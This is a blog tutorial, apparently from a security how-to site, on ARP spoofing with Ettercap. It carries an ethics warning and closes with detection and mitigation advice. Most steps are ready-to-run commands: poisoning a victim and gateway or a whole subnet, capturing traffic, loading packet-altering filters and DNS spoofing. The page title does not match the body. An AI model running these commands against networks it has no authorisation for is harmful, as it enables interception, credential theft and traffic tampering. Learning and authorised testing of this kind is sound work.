cloud9342.click

Ettercap vs. Wireshark: When to Use Each Tool

Written by

admin

in

How to Use Ettercap for ARP Spoofing: A Step-by-Step GuideWarning and ethics first: ARP spoofing is a powerful technique that can intercept, modify, or disrupt network traffic. Use it only on networks and devices you own or have explicit permission to test. Unauthorized use is illegal and unethical.

What is ARP spoofing?

Address Resolution Protocol (ARP) maps IP addresses to MAC addresses on a local network. ARP spoofing (also called ARP poisoning) involves sending forged ARP replies to associate the attacker’s MAC address with another host’s IP (commonly the gateway or another device). Once successful, traffic meant for that IP can be intercepted, monitored, altered, or dropped.

Ettercap is a mature, versatile tool for performing ARP spoofing and other Man-in-the-Middle (MITM) attacks on LANs. It supports active and passive sniffing, filtering, plugin support, and both command-line and graphical interfaces.

Prerequisites

  • A computer running a Unix-like OS (Linux/BSD); Kali Linux and Parrot OS include Ettercap preinstalled.
  • Root privileges to configure network interfaces and run packet injection.
  • Ettercap installed (version 0.8.x or newer recommended).
  • Basic knowledge: IP addressing, subnetting, and ARP.
  • A test lab or explicit authorization to test on a live network.

Install Ettercap (if not present):

# Debian/Ubuntu sudo apt update sudo apt install ettercap-common ettercap-graphical ettercap-text-only # Fedora sudo dnf install ettercap # From source (if needed) git clone https://github.com/Ettercap/ettercap.git cd ettercap mkdir build && cd build cmake .. make sudo make install

Modes of operation

Ettercap provides several modes:

  • Unified sniffing: capture traffic across interfaces.
  • Bridged sniffing: sniff between two interfaces.
  • ARP spoofing: poison ARP caches to place yourself between hosts.
  • Passive sniffing: observe traffic without active poisoning.

We’ll focus on ARP spoofing using unified sniffing in both the graphical (ettercap -G) and command-line (ettercap -T) modes.

Step 1 — Reconnaissance: identify targets

Before launching ARP spoofing, identify hosts on the LAN and the network gateway.

Use arp-scan, nmap, or Ettercap’s built-in host discovery.

Example with nmap:

sudo nmap -sn 192.168.1.0/24

Using Ettercap to discover hosts (text mode):

sudo ettercap -T -M arp:remote /192.168.1.100/ /192.168.1.1/

But typically you’ll list hosts first:

sudo ettercap -T -i eth0 # In interactive mode: Hosts -> Scan for hosts # Then: Hosts -> Hosts list

Step 2 — Enable IP forwarding

To forward intercepted traffic (so victim traffic reaches its legitimate destination), enable IP forwarding:

# Temporary (until reboot) sudo sysctl -w net.ipv4.ip_forward=1 # Permanent: edit /etc/sysctl.conf and set net.ipv4.ip_forward=1

Optionally use iptables to allow forwarding and NAT if you want to route traffic differently or perform transparent proxying:

sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Step 3 — Launch ARP spoofing with Ettercap (graphical)

  1. Start Ettercap GUI: 
    
sudo ettercap -G
  2. Select your network interface (e.g., eth0 or wlan0).
  3. Perform host scan: Hosts -> Scan for hosts.
  4. Open Hosts list: Hosts -> Hosts list. Select the target (victim) and add to Target 1. Select the gateway (router) and add to Target 2.
  5. Start MITM: Mitm -> ARP poisoning. In the dialog, check “sniff remote connections” if available; click OK.
  6. Start sniffing: Start -> Start sniffing.

You’re now in the middle of victim <-> gateway communication. Use the Sniffing or Connections windows to view active connections. You can save captured data to a pcap file for later analysis.

Step 4 — Launch ARP spoofing with Ettercap (command-line)

Command-line is useful for scripting and headless setups.

Basic ARP poisoning between victim (192.168.1.100) and gateway (192.168.1.1):

sudo ettercap -T -q -M arp:remote /192.168.1.100/ /192.168.1.1/

Flags:

  • -T: text-only mode
  • -q: quiet
  • -M arp:remote: ARP MITM mode, remote poisoning (prevents local host poisoning)
  • /IP/: specify target hosts (you can use ranges or hostnames)

To poison an entire subnet (be careful):

sudo ettercap -T -q -M arp:remote /192.168.1.0/24/ /192.168.1.1/

To log to a pcap file:

sudo ettercap -T -q -w capture.pcap -M arp:remote /192.168.1.100/ /192.168.1.1/

Step 5 — Use filters to modify or inspect traffic

Ettercap supports packet filters written in its filtering language. You can alter HTTP, redirect credentials, or inject content.

Example: a simple filter to replace “Hello” with “Hi” in HTTP payloads: Create hello.filter:

if (ip.proto == TCP && tcp.dst == 80) {   if (search(DATA.data, "Hello")) {     replace("Hello", "Hi");     msg("Replaced Hello with Hi ");   } }

Compile and load:

sudo etterfilter hello.filter -o hello.ef sudo ettercap -T -q -F hello.ef -M arp:remote /192.168.1.100/ /192.168.1.1/

Filters are powerful but can break protocols; test in a controlled environment.

Step 6 — Plugins and extensions

Ettercap includes plugins to extend functionality, found in /usr/share/ettercap/plugins or similar.

Common plugins:

  • dns_spoof: spoof DNS replies to redirect domains.
  • logfile: enhanced logging.
  • packet_scan: scan payloads for patterns.

Enable DNS spoofing (with ettercap’s dns_spoof plugin):

  1. Edit /etc/ettercap/etter.conf or dns_spoof configuration file with domain mappings.
  2. Load plugin in GUI (Plugins -> Manage Plugins) or CLI: 
    
sudo ettercap -T -q -P dns_spoof -M arp:remote /victim/ /gateway/

Step 7 — Stopping and cleanup

  • Stop Ettercap (GUI: Start -> Stop sniffing; CLI: Ctrl+C).
  • Disable IP forwarding if you enabled it: 
    
sudo sysctl -w net.ipv4.ip_forward=0
  • Remove iptables rules you added: 
    
sudo iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE

Detection and mitigation (brief)

Network admins can detect ARP spoofing with:

  • Static ARP entries for critical hosts.
  • ARP inspection on managed switches (Dynamic ARP Inspection).
  • Monitoring for duplicate IPs/MACs and frequent ARP replies.
  • Using encrypted protocols (HTTPS, SSH) reduces impact.

To mitigate:

  • Use port security, DHCP snooping, and Dynamic ARP Inspection on switches.
  • Implement network segmentation and VPNs.

Troubleshooting tips

  • If traffic isn’t forwarded, check net.ipv4.ip_forward and iptables.
  • Wireless networks with client isolation prevent MITM between clients.
  • Modern networks may use ARP spoofing defenses—managed switches, IDS/IPS.
  • Ensure you have correct interface and target IPs; mistakes can disconnect you from the network.

Example practical lab scenario (concise)

  1. Lab: Kali VM (eth0: 192.168.56.101), Gateway: 192.168.56.1, Victim VM: 192.168.56.102.
  2. Enable IP forwarding.
  3. Start Ettercap text mode: 
    
sudo ettercap -T -w lab.pcap -M arp:remote /192.168.56.102/ /192.168.56.1/
  4. Observe HTTP credentials in lab.pcap with Wireshark, or test a simple filter to inject content.

Final notes

Ettercap is a flexible tool for learning about MITM attacks and network vulnerabilities. Use it responsibly in controlled environments or with clear authorization. Understanding ARP and proper mitigations helps defenders and testers alike.

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

More posts